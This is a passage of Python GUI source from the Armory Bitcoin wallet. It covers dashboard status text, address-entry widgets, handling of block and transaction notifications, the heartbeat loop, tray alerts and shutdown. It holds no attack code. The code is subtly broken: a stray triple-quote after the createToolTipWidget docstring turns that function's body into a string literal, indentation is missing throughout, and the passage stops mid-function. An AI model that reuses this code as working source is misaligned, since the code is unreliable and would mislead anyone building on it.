self.lblDashModeSync.setText( tr('Synchronizing with Network'), \
size=4, bold=True, color='Foreground')
self.lblTorrentStats.setVisible(False)
self.lblDashModeBuild.setText( tr('Build Databases'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeScan.setText( tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
# If more than 10 days behind, or still downloading torrent
if tdmState=='Downloading' or self.approxBlkLeft > 1440:
descr1 += self.GetDashStateText('Auto', 'InitializingLongTime')
descr2 += self.GetDashStateText('Auto', 'NewUserInfo')
else:
descr1 += self.GetDashStateText('Auto', 'InitializingDoneSoon')
descr2 += self.GetDashStateText('Auto', 'NewUserInfo')
setBtnRowVisible(DASHBTNS.Settings, True)
setBtnFrameVisible(True, \
tr('Since version 0.88, Armory runs bitcoind in the '
'background. You can switch back to '
'the old way in the Settings dialog. '))
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
else:
# User is managing satoshi client, or bitcoind is already sync'd
self.frmDashMidButtons.setVisible(False)
if bdmState in (BDM_OFFLINE, BDM_UNINITIALIZED):
if self.internetStatus == INTERNET_STATUS.Unavailable:
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
setOnlyDashModeVisible()
self.lblBusy.setVisible(False)
self.btnModeSwitch.setVisible(False)
self.btnModeSwitch.setEnabled(False)
self.lblDashModeSync.setText( tr('Armory is <u>offline</u>'), \
size=4, color='TextWarn', bold=True)
if not satoshiIsAvailable():
descr = self.GetDashStateText('User','OfflineNoSatoshiNoInternet')
else:
descr = self.GetDashStateText('User', 'OfflineNoInternet')
descr += '<br><br>'
descr += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr)
else:
LOGINFO('Dashboard switched to user-OfflineOnlinePoss')
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
setOnlyDashModeVisible()
self.lblBusy.setVisible(False)
self.lblDashModeSync.setText(tr('Armory is <u>offline</u>'), size=4, bold=True)
descr = self.GetDashStateText('User', 'OfflineButOnlinePossible')
descr += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr)
if not satoshiIsAvailable():
descr = self.GetDashStateText('User','OfflineNoSatoshi')
setBtnRowVisible(DASHBTNS.Settings, True)
setBtnFrameVisible(True, \
tr('If you would like Armory to manage the Bitcoin software '
'for you (Bitcoin-Qt or bitcoind), then adjust your '
'Armory settings, then restart Armory.'))
descr = self.GetDashStateText('User','OfflineNoSatoshiNoInternet')
else:
self.btnModeSwitch.setVisible(True)
self.btnModeSwitch.setEnabled(True)
self.btnModeSwitch.setText(tr('Go Online!'))
descr = self.GetDashStateText('User', 'OfflineNoInternet')
descr += '<br><br>'
descr += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr)
elif bdmState == BDM_BLOCKCHAIN_READY:
setOnlyDashModeVisible()
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, True)
self.lblBusy.setVisible(False)
if self.netMode == NETWORKMODE.Disconnected:
self.btnModeSwitch.setVisible(False)
self.lblDashModeSync.setText( tr('Armory is disconnected'), size=4, color='TextWarn', bold=True)
descr = self.GetDashStateText('User','Disconnected')
descr += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr)
else:
# Fully online mode
self.btnModeSwitch.setVisible(False)
self.lblDashModeSync.setText( tr('Armory is online!'), color='TextGreen', size=4, bold=True)
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, True)
descr = self.GetDashStateText('User', 'OnlineFull1')
descr += self.GetDashFunctionalityText('Online')
descr += self.GetDashStateText('User', 'OnlineFull2')
self.lblDashDescr1.setText(descr)
#self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Dash)
elif bdmState == BDM_SCANNING:
LOGINFO('Dashboard switched to "Scanning" mode')
self.updateSyncProgress()
self.lblDashModeScan.setVisible(True)
self.barProgressScan.setVisible(True)
self.lblTimeLeftScan.setVisible(True)
self.lblBusy.setVisible(True)
self.btnModeSwitch.setVisible(False)
if TheSDM.getSDMState() == 'BitcoindReady':
self.barProgressSync.setVisible(True)
self.lblTimeLeftSync.setVisible(True)
self.lblDashModeSync.setVisible(True)
self.lblTimeLeftSync.setText('')
self.lblDashModeSync.setText( tr('Synchronizing with Network'), \
size=4, bold=True, color='DisableFG')
else:
self.barProgressSync.setVisible(False)
self.lblTimeLeftSync.setVisible(False)
self.lblDashModeSync.setVisible(False)
if len(str(self.lblDashModeBuild.text()).strip()) == 0:
self.lblDashModeBuild.setText( tr('Preparing Databases'), \
size=4, bold=True, color='Foreground')
if len(str(self.lblDashModeScan.text()).strip()) == 0:
self.lblDashModeScan.setText( tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
if len(self.walletMap)==0:
descr = self.GetDashStateText('User','ScanNoWallets')
else:
descr = self.GetDashStateText('User','ScanWithWallets')
descr += self.GetDashStateText('Auto', 'NewUserInfo')
descr += self.GetDashFunctionalityText('Scanning') + '<br>'
self.lblDashDescr1.setText(descr)
self.lblDashDescr2.setText('')
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Dash)
else:
LOGERROR('What the heck blockchain mode are we in? %s', bdmState)
self.lastSDMState = sdmState
self.lblDashModeTorrent.setContentsMargins( 50,5,50,5)
self.lblDashModeSync.setContentsMargins( 50,5,50,5)
self.lblDashModeBuild.setContentsMargins(50,5,50,5)
self.lblDashModeScan.setContentsMargins( 50,5,50,5)
vbar = self.dashScrollArea.verticalScrollBar()
# On Macs, this causes the main window scroll area to keep bouncing back
# to the top. Not setting the value seems to fix it. DR - 2014/02/12
if not OS_MACOSX:
vbar.setValue(vbar.minimum())
#############################################################################
def createToolTipWidget(self, tiptext, iconSz=2):
"""
The <u></u> is to signal to Qt that it should be interpreted as HTML/Rich
text even if no HTML tags are used. This appears to be necessary for Qt
to wrap the tooltip text.
"""
"""
fgColor = htmlColor('ToolTipQ')
lbl = QLabel('<font size=%d color=%s>(?)</font>' % (iconSz, fgColor))
lbl.setMaximumWidth(relaxedSizeStr(lbl, '(?)')[0])
def setAllText(wself, txt):
def pressEv(ev):
QWhatsThis.showText(ev.globalPos(), txt, self)
wself.mousePressEvent = pressEv
wself.setToolTip('<u></u>' + txt)
# Calling setText on this widget will update both the tooltip and QWT
from types import MethodType
lbl.setText = MethodType(setAllText, lbl)
lbl.setText(tiptext)
return lbl
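# Hypothetical usage sketch (widget/layout names are illustrative only):
#   tip = self.createToolTipWidget(tr('Fees are per-kB, not per-tx'))
#   rowLayout.addWidget(tip)          # clicking "(?)" pops the rich text
#   tip.setText(tr('Updated help'))   # updates both tooltip and QWhatsThis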
#############################################################################
def createAddressEntryWidgets(self, parent, initString='', maxDetectLen=128,
boldDetectParts=0, **cabbKWArgs):
"""
If you are putting the LBL_DETECT somewhere that is space-constrained,
set maxDetectLen to a smaller value. It will limit the number of chars
to be included in the autodetect label.
"cabbKWArgs" is "create address book button kwargs"
Here's the signature of that function... you can pass any named args
to this function and they will be passed along to createAddrBookButton
def createAddrBookButton(parent, targWidget, defaultWltID=None,
actionStr="Select", selectExistingOnly=False,
selectMineOnly=False, getPubKey=False,
showLockboxes=True)
Returns three widgets that can be put into layouts:
[[QLineEdit: addr/pubkey]] [[Button: Addrbook]]
[[Label: Wallet/Lockbox/Addr autodetect]]
"""
addrEntryObjs = {}
addrEntryObjs['QLE_ADDR'] = QLineEdit()
addrEntryObjs['QLE_ADDR'].setText(initString)
addrEntryObjs['BTN_BOOK'] = createAddrBookButton(parent,
addrEntryObjs['QLE_ADDR'],
**cabbKWArgs)
addrEntryObjs['LBL_DETECT'] = QRichLabel('')
addrEntryObjs['CALLBACK_GETSCRIPT'] = None
##########################################################################
# Create a function that reads the user string and updates labels if
# the entry is recognized. This will be used to automatically show the
# user that what they entered is recognized and gives them more info
#
# It's a little awkward to put this whole thing in here... this could
# probably use some refactoring
def updateAddrDetectLabels():
try:
enteredText = str(addrEntryObjs['QLE_ADDR'].text()).strip()
scriptInfo = self.getScriptForUserString(enteredText)
displayInfo = self.getDisplayStringForScript(
scriptInfo['Script'], maxDetectLen, boldDetectParts,
prefIDOverAddr=scriptInfo['ShowID'])
dispStr = displayInfo['String']
if displayInfo['WltID'] is None and displayInfo['LboxID'] is None:
addrEntryObjs['LBL_DETECT'].setText(dispStr)
else:
addrEntryObjs['LBL_DETECT'].setText(dispStr, color='TextBlue')
# No point in repeating what the user just entered
addrEntryObjs['LBL_DETECT'].setVisible(enteredText != dispStr)
addrEntryObjs['QLE_ADDR'].setCursorPosition(0)
except:
#LOGEXCEPT('Invalid recipient string')
addrEntryObjs['LBL_DETECT'].setVisible(False)
# End function to be connected
##########################################################################
# Now actually connect the entry widgets
parent.connect(addrEntryObjs['QLE_ADDR'], SIGNAL('textChanged(QString)'),
updateAddrDetectLabels)
updateAddrDetectLabels()
# Create a func that can be called to get the script that was entered
# This uses getScriptForUserString() which actually returns 4 vals
# rawScript, wltIDorNone, lboxIDorNone, addrStringEntered
# (The last one is really only used to determine what info is most
# relevant to display to the user...it can be ignored in most cases)
def getScript():
entered = str(addrEntryObjs['QLE_ADDR'].text()).strip()
return self.getScriptForUserString(entered)
addrEntryObjs['CALLBACK_GETSCRIPT'] = getScript
return addrEntryObjs
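# Hypothetical usage sketch (layout names are illustrative only):
#   objs = self.createAddressEntryWidgets(self, actionStr='Send')
#   row.addWidget(objs['QLE_ADDR']); row.addWidget(objs['BTN_BOOK'])
#   col.addWidget(objs['LBL_DETECT'])
#   scriptInfo = objs['CALLBACK_GETSCRIPT']()  # same dict returned by
#                                              # getScriptForUserString()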
#############################################################################
def getScriptForUserString(self, userStr):
return getScriptForUserString(userStr, self.walletMap, self.allLockboxes)
#############################################################################
def getDisplayStringForScript(self, binScript, maxChars=256,
doBold=0, prefIDOverAddr=False,
lblTrunc=12, lastTrunc=12):
return getDisplayStringForScript(binScript, self.walletMap,
self.allLockboxes, maxChars, doBold,
prefIDOverAddr, lblTrunc, lastTrunc)
#############################################################################
def checkNewZeroConf(self, ledgers):
'''
Looks at an incoming zero-confirmation transaction queue and determines,
based on the NotifyBtcIn/NotifyBtcOut settings, whether the user should
be notified of each entry. Qualifying transactions are passed along to
the user notification queue.
'''
for le in ledgers:
notifyIn = self.getSettingOrSetDefault('NotifyBtcIn', \
not OS_MACOSX)
notifyOut = self.getSettingOrSetDefault('NotifyBtcOut', \
not OS_MACOSX)
if (le.getValue() <= 0 and notifyOut) or \
(le.getValue() > 0 and notifyIn):
# notifiedAlready = False,
self.notifyQueue.append([le.getWalletID(), le, False])
self.createCombinedLedger()
self.walletModel.reset()
self.lockboxLedgModel.reset()
#############################################################################
def handleCppNotification(self, action, args):
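# Dispatch summary (C++ BDM callback -> GUI reaction):
#   FINISH_LOAD_BLOCKCHAIN_ACTION -> finish UI init and render ledgers
#   NEW_ZC_ACTION                 -> queue zero-conf tx notifications
#   NEW_BLOCK_ACTION              -> refresh ledgers and status-bar height
#   REFRESH_ACTION                -> re-enable wallets/lockboxes after scan
#   'progress'                    -> update side-scan progress displays
#   WARNING_ACTION                -> critical error dialogs (may exit app)
#   SCAN_ACTION                   -> disable wallets/lockboxes during scan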
if action == FINISH_LOAD_BLOCKCHAIN_ACTION:
#Blockchain just finished loading, finish initializing UI and render the
#ledgers
self.blkReceived = RightNow()
if self.needUpdateAfterScan:
LOGDEBUG('Running finishLoadBlockchain')
self.finishLoadBlockchainGUI()
self.needUpdateAfterScan = False
self.setDashboardDetails()
elif action == NEW_ZC_ACTION:
#A zero-conf Tx concerns one of the addresses Armory is tracking; pull the
#updated ledgers from the BDM and create the related notifications.
self.checkNewZeroConf(args)
elif action == NEW_BLOCK_ACTION:
#A new block has appeared, pull updated ledgers from the BDM, display
#the new block height in the status bar and note the block received time
newBlocks = args[0]
if newBlocks>0:
self.ledgerModel.reset()
LOGINFO('New Block! : %d', TheBDM.getTopBlockHeight())
self.createCombinedLedger()
self.blkReceived = RightNow()
self.writeSetting('LastBlkRecvTime', self.blkReceived)
self.writeSetting('LastBlkRecv', TheBDM.getTopBlockHeight())
if self.netMode==NETWORKMODE.Full:
LOGINFO('Current block number: %d', TheBDM.getTopBlockHeight())
self.lblArmoryStatus.setText(\
tr('<font color=%(color)s>Connected (%(hgt)s blocks)</font> ') % \
{ 'color' : htmlColor('TextGreen'), 'hgt' : TheBDM.getTopBlockHeight()})
# Update the wallet view to immediately reflect new balances
self.walletModel.reset()
elif action == REFRESH_ACTION:
#The wallet ledgers have been updated from an event outside of new ZC
#or new blocks (usually a wallet or address was imported, or the
#wallet filter was modified)
reset = False
if len(args) == 0:
self.createCombinedLedger()
return
for wltID in args:
if len(wltID) > 0:
if wltID in self.walletMap:
wlt = self.walletMap[wltID]
wlt.isEnabled = True
self.walletModel.reset()
wlt.doAfterScan()
self.changeWltFilter()
elif wltID in self.lockboxIDMap:
lbID = self.lockboxIDMap[wltID]
self.allLockboxes[lbID].isEnabled = True
if self.lbDialogModel != None:
self.lbDialogModel.reset()
if self.lbDialog != None:
self.lbDialog.changeLBFilter()
elif wltID == "wallet_filter_changed":
reset = True
if wltID in self.walletSideScanProgress:
del self.walletSideScanProgress[wltID]
self.createCombinedLedger(reset)
elif action == 'progress':
#Received progress data for a wallet side scan
wltIDList = args[0]
prog = args[1]
hasWallet = False
hasLockbox = False
for wltID in wltIDList:
self.walletSideScanProgress[wltID] = prog*100
if wltID in self.walletMap:
hasWallet = True
else:
hasLockbox = True
if hasWallet:
self.walletModel.reset()
if hasLockbox:
self.lockboxLedgModel.reset()
if self.lbDialogModel != None:
self.lbDialogModel.reset()
elif action == WARNING_ACTION:
#something went wrong on the C++ side, create a message box to report
#it to the user
if 'rescan' in args[0].lower() or 'rebuild' in args[0].lower():
result = MsgBoxWithDNAA(self, self, MSGBOX.Critical, 'BDM error!', args[0],
"Rebuild and rescan on next start", dnaaStartChk=False)
if result[1] == True:
touchFile( os.path.join(ARMORY_HOME_DIR, 'rebuild.flag') )
elif 'factory reset' in args[0].lower():
result = MsgBoxWithDNAA(self, self, MSGBOX.Critical, 'BDM error!', args[0],
"Factory reset on next start", dnaaStartChk=False)
if result[1] == True:
DlgFactoryReset(self, self).exec_()
else:
QMessageBox.critical(self, tr('BlockDataManager Warning'), \
tr(args[0]), \
QMessageBox.Ok)
#this is a critical error reporting channel, should kill the app right
#after
os._exit(0)
elif action == SCAN_ACTION:
wltIDList = args[0]
hasWallet = False
hasLockbox = False
for wltID in wltIDList:
self.walletSideScanProgress[wltID] = 0
if len(wltID) > 0:
if wltID in self.walletMap:
wlt = self.walletMap[wltID]
wlt.disableWalletUI()
if wltID in self.walletDialogDict:
self.walletDialogDict[wltID].reject()
del self.walletDialogDict[wltID]
hasWallet = True
else:
lbID = self.lockboxIDMap[wltID]
self.allLockboxes[lbID].isEnabled = False
hasLockbox = True
if hasWallet:
self.changeWltFilter()
if hasLockbox:
if self.lbDialogModel != None:
self.lbDialogModel.reset()
if self.lbDialog != None:
self.lbDialog.resetLBSelection()
self.lbDialog.changeLBFilter()
#############################################################################
def Heartbeat(self, nextBeatSec=1):
"""
This method is invoked when the app is initialized, and will
run every second, or whatever is specified in the nextBeatSec
argument.
"""
# Special heartbeat functions are for special windows that may need
# to update much more often (say, every 0.1s) while that window
# is all that matters at that moment, like a download progress window.
# This is "special" because you are putting all other processing on
# hold while this special window is active
# IMPORTANT: Make sure that the special heartbeat function returns
# a value below zero when it's done OR if it errors out!
# Otherwise, it should return the next heartbeat delay,
# which would probably be something like 0.1 for a rapidly
# updating progress counter
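# Hypothetical example (names are illustrative only):
#   def pollDownloadProgress():
#      dlg.updateBar()                          # refresh the window
#      return 0.1 if dlg.isVisible() else -1    # <0 ends the special loop
#   self.extraHeartbeatSpecial.append(pollDownloadProgress)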
for fn in self.extraHeartbeatSpecial:
try:
nextBeat = fn()
if nextBeat>0:
reactor.callLater(nextBeat, self.Heartbeat)
else:
self.extraHeartbeatSpecial = []
reactor.callLater(1, self.Heartbeat)
except:
LOGEXCEPT('Error in special heartbeat function')
self.extraHeartbeatSpecial = []
reactor.callLater(1, self.Heartbeat)
return
# TorrentDownloadManager
# SatoshiDaemonManager
# BlockDataManager
tdmState = TheTDM.getTDMState()
sdmState = TheSDM.getSDMState()
bdmState = TheBDM.getState()
self.heartbeatCount += 1
if self.heartbeatCount % 60 == 20:
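# Runs once per minute, 20 beats into each 60-beat cycle (presumably
# offset so it does not coincide with other minute-aligned work)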
self.processAnnounceData()
self.processAlerts()
try:
# Iterate over a copy: single-shot entries are removed mid-loop below
for func in list(self.extraHeartbeatAlways):
if isinstance(func, list):
fnc = func[0]
kargs = func[1]
keep_running = func[2]
if keep_running == False:
self.extraHeartbeatAlways.remove(func)
fnc(*kargs)
else:
func()
for idx,wltID in enumerate(self.walletIDList):
self.walletMap[wltID].checkWalletLockTimeout()
if self.doAutoBitcoind:
if TheTDM.isRunning(): # TODO Put this whole conditional block in a method
if tdmState=='Downloading':
self.updateSyncProgress()
downRate = TheTDM.getLastStats('downRate')
self.torrentCircBuffer.append(downRate if downRate else 0)
# Assumes 1 sec heartbeat
bufsz = len(self.torrentCircBuffer)
if bufsz > 5*MINUTE:
self.torrentCircBuffer = self.torrentCircBuffer[1:]
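# The buffer holds roughly the last five minutes of once-per-second
# samples; the average below is only consulted once it is nearly full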
if bufsz >= 4.99*MINUTE:
# If dlrate is below 30 kB/s, offer the user a way to skip it
avgDownRate = sum(self.torrentCircBuffer) / float(bufsz)
if avgDownRate < 30*KILOBYTE:
if (RightNow() - self.lastAskedUserStopTorrent) > 5*MINUTE:
self.lastAskedUserStopTorrent = RightNow()
reply = QMessageBox.warning(self, tr('Torrent'), tr("""
Armory is attempting to use BitTorrent to speed up
the initial synchronization, but it appears to be
downloading slowly or not at all.
<br><br>
If the torrent engine is not starting properly,
or is not downloading
at a reasonable speed for your internet connection,
you should disable it in
<i>File\xe2\x86\x92Settings</i> and then
restart Armory."""), QMessageBox.Ok)
# For now, just show once then disable
self.lastAskedUserStopTorrent = UINT64_MAX
if (sdmState in ['BitcoindInitializing','BitcoindSynchronizing']) or \
(sdmState == 'BitcoindReady' and bdmState==BDM_SCANNING):
self.updateSyncProgress()
else:
if bdmState in (BDM_OFFLINE,BDM_UNINITIALIZED):
# This call seems out of place, but it's because if you are in offline
# mode, it needs to check periodically for the existence of Bitcoin-Qt
# so that it can enable the "Go Online" button
self.setDashboardDetails()
return
elif bdmState==BDM_SCANNING: # TODO - Move to handle cpp notification
self.updateSyncProgress()
if self.netMode==NETWORKMODE.Disconnected:
if self.isOnlineModePossible():
self.switchNetworkMode(NETWORKMODE.Full)
if bdmState==BDM_BLOCKCHAIN_READY:
# Trigger any notifications, if we have them... TODO - Remove add to new block, and block chain ready
self.doTheSystemTrayThing()
# Any extra functions that may have been injected to be run TODO - Call on New block
# when new blocks are received.
if len(self.extraNewBlockFunctions) > 0:
cppHead = TheBDM.getMainBlockFromDB(self.currBlockNum)
pyBlock = PyBlock().unserialize(cppHead.getSerializedBlock())
for blockFunc in self.extraNewBlockFunctions:
blockFunc(pyBlock)
blkRecvAgo = RightNow() - self.blkReceived
#blkStampAgo = RightNow() - TheBDM.blockchain().top().getTimestamp() # TODO - show absolute time, and show only on new block
self.lblArmoryStatus.setToolTip(tr('Last block was received %(time)s ago') % \
{ 'time' : secondsToHumanTime(blkRecvAgo) })
# TODO - remove
for func in self.extraHeartbeatOnline:
func()
except:
# When getting the error info, don't collect the traceback in order to
# avoid circular references. https://docs.python.org/2/library/sys.html
# has more info.
LOGEXCEPT('Error in heartbeat function')
(errType, errVal) = sys.exc_info()[:2]
errStr = 'Error Type: %s\nError Value: %s' % (errType, errVal)
LOGERROR(errStr)
finally:
reactor.callLater(nextBeatSec, self.Heartbeat)
#############################################################################
def printAlert(self, moneyID, ledgerAmt, txAmt):
'''
Function that prints a notification for a transaction that affects an
address we control.
'''
dispLines = []
title = ''
totalStr = coin2strNZS(txAmt)
if moneyID in self.walletMap:
wlt = self.walletMap[moneyID]
if len(wlt.labelName) <= 20:
dispName = tr('"%(name)s"') % { 'name' : wlt.labelName }
else:
dispName = tr('"%(shortname)s..."') % { 'shortname' : wlt.labelName[:17] }
dispName = tr('Wallet %(n)s (%(id)s)') % { 'n' : dispName, 'id':wlt.uniqueIDB58}
elif moneyID in self.cppLockboxWltMap:
lbox = self.getLockboxByID(moneyID)
if len(lbox.shortName) <= 20:
dispName = tr('%(M)d-of-%(N)d "%(shortname)s"') % { 'M' : lbox.M, 'N' : lbox.N, 'shortname' : lbox.shortName}
else:
dispName = tr('%(M)d-of-%(N)d "%(shortname)s..."') % {'M' : lbox.M, 'N' : lbox.N, 'shortname' : lbox.shortName[:17] }
dispName = tr('Lockbox %(name)s (%(id)s)') % { 'name' : dispName, 'id' : lbox.uniqueIDB58 }
else:
LOGERROR('Asked to show notification for wlt/lbox we do not have')
return
# Collected everything we need to display, now construct it and do it.
if ledgerAmt > 0:
# Received!
title = tr('Bitcoins Received!')
dispLines.append(tr('Amount: %(total)s BTC') % { 'total' : totalStr })
dispLines.append(tr('Recipient: %(recp)s') % { 'recp' : dispName } )
elif ledgerAmt < 0:
# Sent!
title = tr('Bitcoins Sent!')
dispLines.append(tr('Amount: %(tot)s BTC') % { 'tot' : totalStr })
dispLines.append(tr('Sender: %(disp)s') % { 'disp' : dispName })
self.showTrayMsg(title, '\n'.join(dispLines), \
QSystemTrayIcon.Information, 10000)
LOGINFO(title)
#############################################################################
def doTheSystemTrayThing(self):
"""
I named this method as it is because this is not just "show a message."
I need to display all relevant transactions, in the sequence they were
received. I will store them in self.notifyQueue, and this method will
do nothing if it's empty.
"""
if not TheBDM.getState()==BDM_BLOCKCHAIN_READY or \
RightNow()<self.notifyBlockedUntil:
return
# Notify queue input is: [WltID/LBID, LedgerEntry, alreadyNotified]
for i in range(len(self.notifyQueue)):
moneyID, le, alreadyNotified = self.notifyQueue[i]
# Skip the ones we've notified of already.
if alreadyNotified:
continue
# Mark it alreadyNotified=True
self.notifyQueue[i][2] = True
# Catch condition that somehow the tx isn't related to us
if le.getTxHash()=='\x00'*32:
continue
# Make sure the wallet ID or lockbox ID keys are actually valid before
# using them to grab the appropriate C++ wallet.
pywlt = self.walletMap.get(moneyID)
lbox = self.getLockboxByID(moneyID)
# If we couldn't find a matching wallet or lbox, bail
if pywlt is None and lbox is None:
LOGERROR('Could not find moneyID = %s; skipping notify' % moneyID)
continue
if pywlt:
cppWlt = self.walletMap[moneyID].cppWallet
wname = self.walletMap[moneyID].labelName
if len(wname)>20:
wname = wname[:17] + '...'
wltName = tr('Wallet "%(wname)s" (%(moneyID)s)') % { 'wname': wname, 'moneyID' : moneyID }
else:
cppWlt = self.cppLockboxWltMap[moneyID]
lbox = self.getLockboxByID(moneyID)
M = self.getLockboxByID(moneyID).M
N = self.getLockboxByID(moneyID).N
lname = self.getLockboxByID(moneyID).shortName
if len(lname) > 20:
lname = lname[:17] + '...'
wltName = tr('Lockbox %(M)d-of-%(N)d "%(lname)s" (%(id)s)') % { 'M' : M, 'N' : N, 'lname' : lname, 'id' : moneyID }
if le.isSentToSelf():
# Used to display the sent-to-self amount, but if this is a lockbox
# we only have a cppWallet, and the determineSentToSelfAmt() func
# only operates on python wallets. Oh well, the user can double-
# click on the tx in their ledger if they want to see what's in it.
# amt = determineSentToSelfAmt(le, cppWlt)[0]
# self.showTrayMsg('Your bitcoins just did a lap!', \
# 'Wallet "%s" (%s) just sent %s BTC to itself!' % \
# (wlt.labelName, moneyID, coin2str(amt,maxZeros=1).strip()),
self.showTrayMsg(tr('Your bitcoins just did a lap!'), \
tr('%(wltName)s just sent some BTC to itself!') % { 'wltName' : wltName }, \
QSystemTrayIcon.Information, 10000)
return
# If coins were either received or sent from the loaded wlt/lbox
dispLines = []
totalStr = coin2strNZS(abs(le.getValue()))
if le.getValue() > 0:
title = tr('Bitcoins Received!')
dispLines.append(tr('Amount: %(tot)s BTC') % { 'tot' : totalStr })
dispLines.append(tr('From: %(wlt)s') % { 'wlt' : wltName })
elif le.getValue() < 0:
# Also display the address of where they went
txref = TheBDM.bdv().getTxByHash(le.getTxHash())
nOut = txref.getNumTxOut()
recipStr = ''
for i in range(nOut):
script = txref.getTxOutCopy(i).getScript()
if cppWlt.hasScrAddress(script_to_scrAddr(script)):
continue
if len(recipStr)==0:
recipStr = self.getDisplayStringForScript(script, 45)['String']
else:
recipStr = tr('<Multiple Recipients>')
title = tr('Bitcoins Sent!')
dispLines.append(tr('Amount: %(tot)s BTC') % { 'tot' : totalStr })
dispLines.append(tr('From: %(wlt)s') % { 'wlt' : wltName })
dispLines.append(tr('To: %(recp)s') % { 'recp' : recipStr })
self.showTrayMsg(title, '\n'.join(dispLines), \
QSystemTrayIcon.Information, 10000)
LOGINFO(title + '\n' + '\n'.join(dispLines))
# Wait for 5 seconds before processing the next queue object.
self.notifyBlockedUntil = RightNow() + 5
return
#############################################################################
def closeEvent(self, event=None):
moc = self.getSettingOrSetDefault('MinimizeOrClose', 'DontKnow')
doClose, doMinimize = False, False
if moc=='DontKnow':
reply,remember = MsgBoxWithDNAA(self, self, MSGBOX.Question, tr('Minimize or Close'), \
tr('Would you like to minimize Armory to the system tray instead '
'of closing it?'), dnaaMsg=tr('Remember my answer'), \
yesStr=tr('Minimize'), noStr=tr('Close'))
if reply==True:
doMinimize = True
if remember:
self.writeSetting('MinimizeOrClose', 'Minimize')
else:
doClose = True
if remember:
self.writeSetting('MinimizeOrClose', 'Close')
if doMinimize or moc=='Minimize':
self.minimizeArmory()
if event:
event.ignore()
elif doClose or moc=='Close':
self.doShutdown = True
self.sysTray.hide()
self.closeForReal()
if event: event.ignore()
else:
return # how would we get here?
#############################################################################
def unpackLinuxTarGz(self, targzFile, changeSettings=True):
if targzFile is None:
return None
if not os.path.exists(targzFile):
return None
unpackDir = os.path.join(ARMORY_HOME_DIR, 'latestBitcoinInst')
unpackDir2 = os.path.join(ARMORY_HOME_DIR, 'latestBitcoinInstOld')
if os.path.exists(unpackDir):
if os.path.exists(unpackDir2):
shutil.rmtree(unpackDir2)
shutil.move(unpackDir, unpackDir2)
os.mkdir(unpackDir)
out,err = execAndWait('tar -zxf %s -C %s' % (targzFile, unpackDir), \
timeout=5)
LOGINFO('UNPACK STDOUT: "' + out + '"')
LOGINFO('UNPACK STDERR: "' + err + '"')
# There should only be one subdir
unpackDirChild = None
for fn in os.listdir(unpackDir):
unpackDirChild = os.path.join(unpackDir, fn)
if unpackDirChild is None:
LOGERROR('There was apparently an error unpacking the file')
return None
finalDir = os.path.abspath(unpackDirChild)
LOGWARN('Bitcoin Core unpacked into: %s', finalDir)
if changeSettings:
self.settings.set('SatoshiExe', finalDir)
return finalDir
#############################################################################
def closeForReal(self):
'''
Unlike File->Quit or clicking the X on the window, which may actually
minimize Armory, this method is for *really* closing Armory
'''
self.setCursor(Qt.WaitCursor)
self.showShuttingDownMessage()
try:
# Save the main window geometry in the settings file
self.writeSetting('MainGeometry', str(self.saveGeometry().toHex()))
self.writeSetting('MainWalletCols', saveTableView(self.walletsView))
self.writeSetting('MainLedgerCols', saveTableView(self.ledgerView))
if TheBDM.getState()==BDM_SCANNING:
LOGINFO('BDM state is scanning -- force shutdown BDM')
else:
LOGINFO('BDM is safe for clean shutdown')
#no callback notify in offline mode, just exit
if TheBDM.getState() in (BDM_OFFLINE,BDM_UNINITIALIZED):
self.actuallyDoExitNow(STOPPED_ACTION, 1)
return
self.shutdownBitcoindThread = threading.Thread(target=TheSDM.stopBitcoind)
self.shutdownBitcoindThread.start()
TheBDM.registerCppNotification(self.actuallyDoExitNow)
TheBDM.beginCleanShutdown()
# Remove Temp Modules Directory if it exists:
if self.tempModulesDirName:
shutil.rmtree(self.tempModulesDirName)
except:
# Don't want a strange error here interrupt shutdown
LOGEXCEPT('Strange error during shutdown')
def actuallyDoExitNow(self, action, l):
# this is a BDM callback
if action != STOPPED_ACTION:
return
# Any extra shutdown activities, perhaps added by modules
for fn in self.extraShutdownFunctions:
try:
fn()
except:
LOGEXCEPT('Shutdown function failed. Skipping.')
# This will do nothing if bitcoind isn't running.
try:
self.shutdownBitcoindThread.join()
except:
pass
from twisted.internet import reactor
LOGINFO('Attempting to close the main window!')
reactor.stop()
#############################################################################
def execTrigger(self, toSpawn):
super(ArmoryDialog, toSpawn).exec_()
#############################################################################
def initTrigger(self, toInit):
if isinstance(toInit, DlgProgress):
toInit.setup(self)
toInit.status = 1
#############################################################################
def checkForNegImports(self):
negativeImports = []
for wlt in self.walletMap:
if self.walletMap[wlt].hasNegativeImports:
negativeImports.append(self.walletMap[wlt].uniqueIDB58)
# If we detect any negative import
if len(negativeImports) > 0:
logDirs = []
for wltID in negativeImports:
if not wltID in self.walletMap:
continue
homedir = os.path.dirname(self.walletMap[wltID].walletPath)
wltlogdir = os.path.join(homedir, wltID)
if not os.path.exists(wltlogdir):
continue
for subdirname in os.listdir(wltlogdir):
subdirpath = os.path.join(wltlogdir, subdirname)
logDirs.append([wltID, subdirpath])
DlgInconsistentWltReport(self, self, logDirs).exec_()
#############################################################################
def getAllRecoveryLogDirs(self, wltIDList):
self.logDirs = []
for wltID in wltIDList:
if not wltID in self.walletMap:
continue
homedir = os.path.dirname(self.walletMap[wltID].walletPath)
logdir = os.path.join(homedir, wltID)
if not os.path.exists(logdir):
continue
self.logDirs.append([wltID, logdir])
return self.logDirs
#############################################################################
@AllowAsync
def CheckWalletConsistency(self, wallets, prgAt=None):
if prgAt:
totalSize = 0
walletSize = {}
for wlt in wallets:
statinfo = os.stat(wallets[wlt].walletPath)
walletSize[wlt] = statinfo.st_size
totalSize = totalSize + statinfo.st_size
i=0
